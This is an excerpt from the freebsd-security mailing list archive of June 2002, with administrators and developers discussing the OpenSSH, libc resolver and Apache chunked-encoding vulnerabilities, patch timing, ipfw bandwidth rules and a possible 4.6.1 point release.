RELENG_4_5 does not have this bug, so you don't even have to >turn off ChallengeResponseAuthentication to be safe from this particular >vulnerability. You're safe either way. If you're running older versions be careful. This option may not exist, and hupping a server with this in place can cause it to shut itself down, leaving you with no daemon running. Mark Thomas --- thomas@pbegames.com ----> http://www.pbegames.com/~thomas Play by Electron Games -> http://www.pbegames.com Free Trial Games To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5:26:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id D0B0637B417 for ; Thu, 27 Jun 2002 05:26:47 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 231525362; Thu, 27 Jun 2002 14:26:45 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Sean Kelly Cc: security@freebsd.org Subject: Re: Another one? References: <20020627050613.GA11039@edgemaster.zombie.org> From: Dag-Erling Smorgrav Date: 27 Jun 2002 14:26:45 +0200 In-Reply-To: <20020627050613.GA11039@edgemaster.zombie.org> Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Sean Kelly writes: > According to CERT, us OpenSSH 2.9 users aren't safe either. Yes, you are. CERT isn't telling the whole story. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5:29:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 77EAF37B405 for ; Thu, 27 Jun 2002 05:29:37 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id E25985362; Thu, 27 Jun 2002 14:29:30 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Marcin Gryszkalis Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh OR openssh-portable References: <3D1AD7C4.9020909@cerint.pl> From: Dag-Erling Smorgrav Date: 27 Jun 2002 14:29:29 +0200 In-Reply-To: <3D1AD7C4.9020909@cerint.pl> Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Marcin Gryszkalis writes: > Which port should I use (I'm migrating from -stable basesystem ssh) Neither. Calm down and wait for 3.4p1 to hit -STABLE. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 5:59: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from home.24cl.com (174.113.sn.ct.dsl.thebiz.net [216.238.113.174]) by hub.freebsd.org (Postfix) with ESMTP id BC5AA37B409 for ; Thu, 27 Jun 2002 05:59:00 -0700 (PDT) Received: from ntmm (unknown [63.119.50.193]) by home.24cl.com (Postfix) with ESMTP id 324892B27E for ; Thu, 27 Jun 2002 08:58:57 -0400 (EDT) Message-ID: <200206270858570586.03A65B95@sentry.24cl.com> In-Reply-To: <86it45z16g.fsf_-_@blade-runner.mit.edu> References: <20020626121754.F8071@mail.seattleFenix.net> <200206261919.g5QJJLLI018466@cvs.openbsd.org> <20020626202057.GA7152@zot.electricrain.com> <20020626223919.GA31673@elvis.mu.org> <86it45z16g.fsf_-_@blade-runner.mit.edu> X-Mailer: Calypso Version 3.30.00.00 (1) Date: Thu, 27 Jun 2002 08:58:57 -0400 Reply-To: myraq@mgm51.com From: "MikeM" To: freebsd-security@FreeBSD.ORG Subject: Re: Meta (was Re: Wow) Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 6/27/02 at 2:27 AM Petr Swedock wrote: > >With that thought in mind, here's a stack of >what is of concern to me. >[snip - long, self-centered list removed] > >So those are my concerns. I'm interested to know >if others share these concerns and what we can >do about them. ============= I don't share your concerns. I think you can stop cluttering up the list with them. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 6:26:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-128.dsl.lsan03.pacbell.net [63.207.60.128]) by hub.freebsd.org (Postfix) with ESMTP id EE45E37B400; Thu, 27 Jun 2002 06:26:17 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 3E0DC66BC9; Thu, 27 Jun 2002 06:26:17 -0700 (PDT) Date: Thu, 27 Jun 2002 06:26:16 -0700 From: Kris Kennaway To: "Jacques A. Vidrine" Cc: Robert Watson , FreeBSD Security Subject: Re: [openssh-unix-announce] Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020627062616.A6065@xor.obsecurity.org> References: <20020624220229.A92101@cowbert.2y.net> <20020625025232.GC43738@madman.nectar.cc> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="9amGYk9869ThD9tj" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020625025232.GC43738@madman.nectar.cc>; from nectar@freebsd.org on Mon, Jun 24, 2002 at 09:52:32PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --9amGYk9869ThD9tj Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jun 24, 2002 at 09:52:32PM -0500, Jacques A. Vidrine wrote: > On Mon, Jun 24, 2002 at 10:18:19PM -0400, Robert Watson wrote: > > In order to do this and maintain PAM > > support, we'll be jumping from the base OpenSSH distribution to the > > OpenSSH-portable distribution, which includes support for PAM (as PAM is > > not used in OpenBSD). =20 >=20 > As a side note, this just forced the issue. It is kind of a > historical mistake that OpenSSH-portable was not imported in the first > place Actually when we first imported OpenSSH I don't believe the OpenSSH-portable variant yet existed. Kris --9amGYk9869ThD9tj Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9GxJ4Wry0BWjoQKURAugAAJ9t6nlOc/UYrQ82qYYR8/ryGHsyzACfbZUq REQsCHPH2s7GwHQD5FakakQ= =HC4U -----END PGP SIGNATURE----- --9amGYk9869ThD9tj-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 6:37:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by hub.freebsd.org (Postfix) with ESMTP id F06BD37B400 for ; Thu, 27 Jun 2002 06:37:18 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.2/8.12.2) with ESMTP id g5RDbBMx084490; Fri, 28 Jun 2002 01:37:11 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Fri, 28 Jun 2002 01:37:11 +1200 (NZST) From: Andrew McNaughton X-X-Sender: andrew@a2 To: Maxim Kozin Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords In-Reply-To: Message-ID: <20020628013529.I83962-100000@a2> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Maxim Kozin wrote: > Problem: setup openssh + pam(some self-write module) > When I don't create full chroot enviromnet in /usr/local/empty, Have you changed this to use /usr/local/empty? It wanted me to set this up as /var/empty. > sshd -d -d -d fail in start_pam. > All symbol in my_pam.so must be resolved on privsep step, because > copy in chroot all need libs,/etc/pam.conf and /etc/passwd > Now I can see, that pam started, make succefuly auth. > BUt session disconected with diagnostic: > debug3: monitor_read: checking request 24 > debug3: mm_send_keystate: Finished sending state > monitor_read: unsupported request: 24 > debug1: Calling cleanup 0x806d98c(0x0) > > "Request type 24" is some about tty/pty ? Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 7:11:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailhost1.dircon.co.uk (mailhost1.dircon.co.uk [194.112.32.65]) by hub.freebsd.org (Postfix) with ESMTP id 72EE437B407 for ; Thu, 27 Jun 2002 07:11:31 -0700 (PDT) Received: from lt1.cleaton.net (desk17.ch.netscalibur.co.uk [195.157.3.17]) by mailhost1.dircon.co.uk (Postfix) with ESMTP id 5953958409 for ; Thu, 27 Jun 2002 15:11:30 +0100 (BST) Received: (from nick@localhost) by lt1.cleaton.net (8.11.6/8.11.6) id g5RE9GD00996 for security@freebsd.org; Thu, 27 Jun 2002 15:09:16 +0100 (BST) (envelope-from nick@cleaton.net) Date: Thu, 27 Jun 2002 15:09:16 +0100 From: Nick Cleaton To: security@freebsd.org Subject: x86 binary patch to disable chunked encoding in Apache 1.3.x Message-ID: <20020627150916.A933@lt1.cleaton.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I have a perl script to disable client->server chunked encoding in Apache 1.3.x on x86, by directly modifying the httpd binary itself. It could be handy as a last resort for those who can't rebuild apache or use mod_blowchunks. http://cleaton.net/tmp/bp -- Nick Cleaton nick@cleaton.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 7:58:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from web11605.mail.yahoo.com (web11605.mail.yahoo.com [216.136.172.57]) by hub.freebsd.org (Postfix) with SMTP id 0C19937B401 for ; Thu, 27 Jun 2002 07:58:30 -0700 (PDT) Message-ID: <20020627145830.71423.qmail@web11605.mail.yahoo.com> Received: from [24.191.164.44] by web11605.mail.yahoo.com via HTTP; Thu, 27 Jun 2002 07:58:30 PDT Date: Thu, 27 Jun 2002 07:58:30 -0700 (PDT) From: Holt Grendal Subject: FINAL Question to END all Questions about OpenSSH To: security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I saw DES mention that OpenSSH 3.4 would be put into -STABLE So the final question: When will OpenSSH 3.4 be imported to -STABLE? As soon as everyone can do a normal 'make world' to FIX openssh and the libc resolv problem both, everyone will be much happier! Atleast I will! Holt __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 8: 4:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from relay1.san1.aens.net (relay1.san1.aens.net [192.215.81.74]) by hub.freebsd.org (Postfix) with ESMTP id E417937B405 for ; Thu, 27 Jun 2002 08:04:25 -0700 (PDT) Received: from sinet001.PEAKtechnical.com ([207.252.187.100]) by relay1.san1.aens.net (8.11.6/8.9.3) with ESMTP id g5RF5bK32386 for ; Thu, 27 Jun 2002 15:05:37 GMT Message-ID: From: "Sorisio,Chris" To: "'security@freebsd.org'" Subject: [Slightly Off Topic?] Stateful Filtering & IPFW Pipes Date: Thu, 27 Jun 2002 11:04:23 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21DEB.EC125660" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C21DEB.EC125660 Content-Type: text/plain; charset="iso-8859-1" Hola folks, I apologize if this question is somewhat off-topic for the list. Is it possible to statefully filter a specific service emulating a full-duplex medium using ipfw and dummynet? For example, suppose I wanted to limit all ssh traffic to 1.21 jigawatts per second. I know that, on the outbound pipe, I could do something like: ipfw add pipe 1 ip from any to dst-port 22 pipe 1 config bw 256Kbit/s But how do I apply the same rule on the other half of the connection? Thanks for your time, Chris Sorisio ------_=_NextPart_001_01C21DEB.EC125660 Content-Type: text/html; charset="iso-8859-1" [Slightly Off Topic?] Stateful Filtering & IPFW Pipes

Hola folks,

I apologize if this question is somewhat off-topic for the list.

Is it possible to statefully filter a specific service emulating a full-duplex medium using ipfw and dummynet?

For example, suppose I wanted to limit all ssh traffic to 1.21 jigawatts per second.

I know that, on the outbound pipe, I could do something like:

ipfw add pipe 1 ip from any to dst-port 22
pipe 1 config bw 256Kbit/s

But how do I apply the same rule on the other half of the connection?

Thanks for your time,

Chris Sorisio

------_=_NextPart_001_01C21DEB.EC125660-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 8:16: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from relay1.san1.aens.net (relay1.san1.aens.net [192.215.81.74]) by hub.freebsd.org (Postfix) with ESMTP id A194C37B400 for ; Thu, 27 Jun 2002 08:16:01 -0700 (PDT) Received: from sinet001.PEAKtechnical.com ([207.252.187.100]) by relay1.san1.aens.net (8.11.6/8.9.3) with ESMTP id g5RFHDK15302 for ; Thu, 27 Jun 2002 15:17:13 GMT Message-ID: From: "Sorisio,Chris" To: "'security@freebsd.org'" Subject: [Slightly Off Topic?] Stateful Filtering & IPFW Pipes Date: Thu, 27 Jun 2002 11:15:58 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C21DED.8A7DCC70" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C21DED.8A7DCC70 Content-Type: text/plain; charset="iso-8859-1" [Argh. How embarrassing. Not only am I using Outlook, but it sent my first e-mail as HTML!] Hola folks, I apologize if this question is somewhat off-topic for the list. Is it possible to statefully filter a specific service emulating a full-duplex medium using ipfw and dummynet? For example, suppose I wanted to limit all ssh traffic to 1.21 jigawatts per second. I know that, on the outbound pipe, I could do something like: ipfw add pipe 1 ip from any to dst-port 22 pipe 1 config bw 256Kbit/s But how do I apply the same rule on the other half of the connection? Thanks for your time, Chris Sorisio ------_=_NextPart_001_01C21DED.8A7DCC70 Content-Type: text/html; charset="iso-8859-1" [Slightly Off Topic?] Stateful Filtering & IPFW Pipes

[Argh.  How embarrassing.  Not only am I using Outlook, but it sent my first e-mail as HTML!]

Hola folks,

I apologize if this question is somewhat off-topic for the list.

Is it possible to statefully filter a specific service emulating a full-duplex medium using ipfw and dummynet?

For example, suppose I wanted to limit all ssh traffic to 1.21 jigawatts per second.

I know that, on the outbound pipe, I could do something like:

ipfw add pipe 1 ip from any to dst-port 22
pipe 1 config bw 256Kbit/s

But how do I apply the same rule on the other half of the connection?

Thanks for your time,

Chris Sorisio

------_=_NextPart_001_01C21DED.8A7DCC70-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 8:50:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 15E2B37B400 for ; Thu, 27 Jun 2002 08:50:21 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g5RFntDK031653; Thu, 27 Jun 2002 11:49:55 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g5RFnsWb031650; Thu, 27 Jun 2002 11:49:54 -0400 (EDT) (envelope-from wollman) Date: Thu, 27 Jun 2002 11:49:54 -0400 (EDT) From: Garrett Wollman Message-Id: <200206271549.g5RFnsWb031650@khavrinen.lcs.mit.edu> To: Marc Slemko Cc: security@FreeBSD.ORG Subject: Re: FreeBSD vuln... In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > No question, the real bug is in Apache for passing in a negative > length, however the particular exploit only works due to some very > interesting details of how memcpy() is doing things that could arguably > be called wrong. The length parameter to memcpy is unsigned. There is no such thing as `passing a negative length to memcpy'. One can, of course, pass an extremely large positive length to memcpy, generated by converting a negative signed integer to an unsigned integer on a two's-complement machine. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 9:18: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id DBDCC37B401 for ; Thu, 27 Jun 2002 09:17:58 -0700 (PDT) Received: (from root@localhost) by lariat.org (8.9.3/8.9.3) id KAA04440; Thu, 27 Jun 2002 10:17:49 -0600 (MDT) Date: Thu, 27 Jun 2002 10:17:49 -0600 (MDT) From: Brett Glass Message-Id: <200206271617.KAA04440@lariat.org> To: bright@mu.org, odela01@ca.com Subject: Re: resolv and dynamic linking to compat libc Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020627071849.GG18877@elvis.mu.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Last night, I saw an attempted attackl that may have been an attempt to subvert a build of Apache 2.0.39 built with the buggy libc. Apache had spawned dozens of child processes, which all hung (they were trying to double-free memory) and the server was completely locked up. As far as I can tell, the intruder didn't make it in but did manage to mess up Apache's unprivileged child processes -- a first step. Apache is one of the most likely targets for a libc exploit, because so many servers run it. Beware, folks; the most important programs to rebuild are daemons like Apache, which are often statically linked and which you may or may not have installed as ports. (I built it straight from the Apache Project tarball.) And if you've installed anything as a binary package, be careful! As I've mentioned before on this list, the packages on the FreeBSD servers are not rebuilt nightly (as they should be). Every package on the public servers is probably STILL built with the faulty libc. Whoever manages ftp.freebsd.org should immediately take the package collection offline until the entire collection is rebuilt, and then make sure the mirrors get it. It would also be nice to start seeing those nightly builds (using make, of course, so that effort is not wasted if nothing has changed). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 9:43:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from bunning.skiltech.com (bunning.skiltech.com [216.235.79.240]) by hub.freebsd.org (Postfix) with ESMTP id 3C19237B400 for ; Thu, 27 Jun 2002 09:43:28 -0700 (PDT) Received: (from root@localhost) by bunning.skiltech.com (8.12.3/8.11.6) id g5RGhQkN093520; Thu, 27 Jun 2002 12:43:26 -0400 (EDT) (envelope-from minter@bunning.skiltech.com) Received: from bunning.skiltech.com (localhost [127.0.0.1]) by bunning.skiltech.com (8.12.3/8.12.3) with ESMTP id g5RGhNgh093509 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO); Thu, 27 Jun 2002 12:43:24 -0400 (EDT) (envelope-from minter@bunning.skiltech.com) Received: (from minter@localhost) by bunning.skiltech.com (8.12.3/8.12.3/Submit) id g5RGhNC8093508; Thu, 27 Jun 2002 12:43:23 -0400 (EDT) Date: Thu, 27 Jun 2002 12:43:23 -0400 (EDT) From: "H. Wade Minter" X-X-Sender: minter@bunning.skiltech.com To: Brett Glass Cc: bright@mu.org, , Subject: Re: resolv and dynamic linking to compat libc In-Reply-To: <200206271617.KAA04440@lariat.org> Message-ID: <20020627124102.V92880-100000@bunning.skiltech.com> X-Folkin-Excellent: Eddie From Ohio (efohio.com) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 27 Jun 2002, Brett Glass wrote: > Last night, I saw an attempted attackl that may have been an attempt to > subvert a build of Apache 2.0.39 built with the buggy libc. Apache had spawned > dozens of child processes, which all hung (they were trying to double-free > memory) and the server was completely locked up. As far as I can tell, the > intruder didn't make it in but did manage to mess up Apache's unprivileged > child processes -- a first step. My version of apache from ports seems to dynamically link libc.so.4, not statically, which would indicate to me that it would pick up a rebuild patched libc, and wouldn't need to be rebuilt itself. bash-2.05a# ldd /usr/local/sbin/httpd /usr/local/sbin/httpd: libcrypt.so.2 => /usr/lib/libcrypt.so.2 (0x280a9000) libmm.so.11 => /usr/local/lib/libmm.so.11 (0x280c2000) libc.so.4 => /usr/lib/libc.so.4 (0x280c6000) bash-2.05a# Anyone care to confirm/deny that? I scanned for statically linked binaries in /usr/local/bin, and only found a couple (mostly shells), so I rebuilt those. --Wade -- 'I say to you that the VCR is to the American film producer and the American public as the Boston strangler is to the woman home alone.' Jack Valenti on VCRs, 1982 'It's getting clear -- alarmingly clear, I might add -- that we are in the midst of the possibility of Armageddon.' Jack Valenti on the Internet, 2002 http://www.digitalconsumer.org/ http://digitalspeech.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 9:55: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 7435937B400 for ; Thu, 27 Jun 2002 09:55:04 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.4/8.12.4) with SMTP id g5RGt1bM009459; Thu, 27 Jun 2002 12:55:01 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Thu, 27 Jun 2002 12:55:01 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Brett Glass Cc: bright@mu.org, odela01@ca.com, freebsd-security@FreeBSD.ORG Subject: Re: resolv and dynamic linking to compat libc In-Reply-To: <200206271617.KAA04440@lariat.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 27 Jun 2002, Brett Glass wrote: > Last night, I saw an attempted attackl that may have been an attempt to > subvert a build of Apache 2.0.39 built with the buggy libc. Apache had > spawned dozens of child processes, which all hung (they were trying to > double-free memory) and the server was completely locked up. As far as I > can tell, the intruder didn't make it in but did manage to mess up > Apache's unprivileged child processes -- a first step. > > Apache is one of the most likely targets for a libc exploit, because so > many servers run it. Beware, folks; the most important programs to > rebuild are daemons like Apache, which are often statically linked and > which you may or may not have installed as ports. (I built it straight > from the Apache Project tarball.) And if you've installed anything as a > binary package, be careful! As I've mentioned before on this list, the > packages on the FreeBSD servers are not rebuilt nightly (as they should > be). Every package on the public servers is probably STILL built with > the faulty libc. Whoever manages ftp.freebsd.org should immediately take > the package collection offline until the entire collection is rebuilt, > and then make sure the mirrors get it. It would also be nice to start > seeing those nightly builds (using make, of course, so that effort is > not wasted if nothing has changed). Apache is actually a fairly unlikely target for the libc resolver attack, because it's default shipped both as dynamically linked, and because it doesn't ship doing reverse DNS lookups by default for performance reasons. Far more likely targets are tools such as sendmail or sshd, which do predictable DNS lookups based on externally generated network traffic. While it is possible to configure Apache to perform DNS operations based on traffic (either explicitly in the configuration file to support hostnames in logs, or implicitly through access control rules based on hostnames), a scripted attack would likely not be very effective against Apache using this attack vector. We are aware of the ftp apache package problem and attempting to resolve it. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 9:58:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 827C137B434 for ; Thu, 27 Jun 2002 09:58:45 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5RGwjl1068045; Thu, 27 Jun 2002 09:58:45 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5RGweBm068044; Thu, 27 Jun 2002 09:58:40 -0700 (PDT) (envelope-from dillon) Date: Thu, 27 Jun 2002 09:58:40 -0700 (PDT) From: Matthew Dillon Message-Id: <200206271658.g5RGweBm068044@apollo.backplane.com> To: Stefano Riva Cc: Mark.Andrews@isc.org, Brett Glass , security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv References: <3.0.5.32.20020627112059.00a3f100@civetta.gufi.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'm beginning to think that once all this settles down a 4.6.1 release may be a good idea. Apache, ssh, now the resolver... nasty. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 10:15:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id D0A0537B400 for ; Thu, 27 Jun 2002 10:15:13 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.4/8.12.4) with SMTP id g5RHF4bM009686; Thu, 27 Jun 2002 13:15:04 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Thu, 27 Jun 2002 13:15:03 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Matthew Dillon Cc: Stefano Riva , Mark.Andrews@isc.org, Brett Glass , security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <200206271658.g5RGweBm068044@apollo.backplane.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 27 Jun 2002, Matthew Dillon wrote: > I'm beginning to think that once all this settles down a 4.6.1 release > may be a good idea. Apache, ssh, now the resolver... nasty. I've been wondering about that also. However, the release engineering process is fairly heavy-weight, and the last time we did a light-weight x.x.1 release, people leapt on that opportunity to over-load it with lots of minor fixes that ended up making it a fairly broken release (since inevitably they weren't minor, but we weren't willing to do a full heavy-weight release). Regardless, we'd want to wait to spin a .x.x.1 release until the new OpenSSH was merged back, I think, so it will be a bit yet before we can really make a decision on this. The best strategy would be to literally slap down another tag on RELENG_4_6 and call it RELENG_4_6_1 point-release. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 27 10:31:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [192.203.228.196]) by hub.freebsd.org (Postfix) with ESMTP id C7C4837B40B; Thu, 27 Jun 2002 10:31:38 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1192) id 58790AE25C; Thu, 27 Jun 2002 10:31:38 -0700 (PDT) Date: Thu, 27 Jun 2002 10:31:38 -0700 From: Alfred Perlstein To: Robert Watson Cc: Brett Glass , odela01@ca.com, freebsd-security@FreeBSD.ORG, "H. Wade Minter" Subject: Re: resolv and dynamic linking to compat libc Message-ID: <20020627173138.GO18877@elvis.mu.org> References: <200206271617.KAA04440@lariat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: 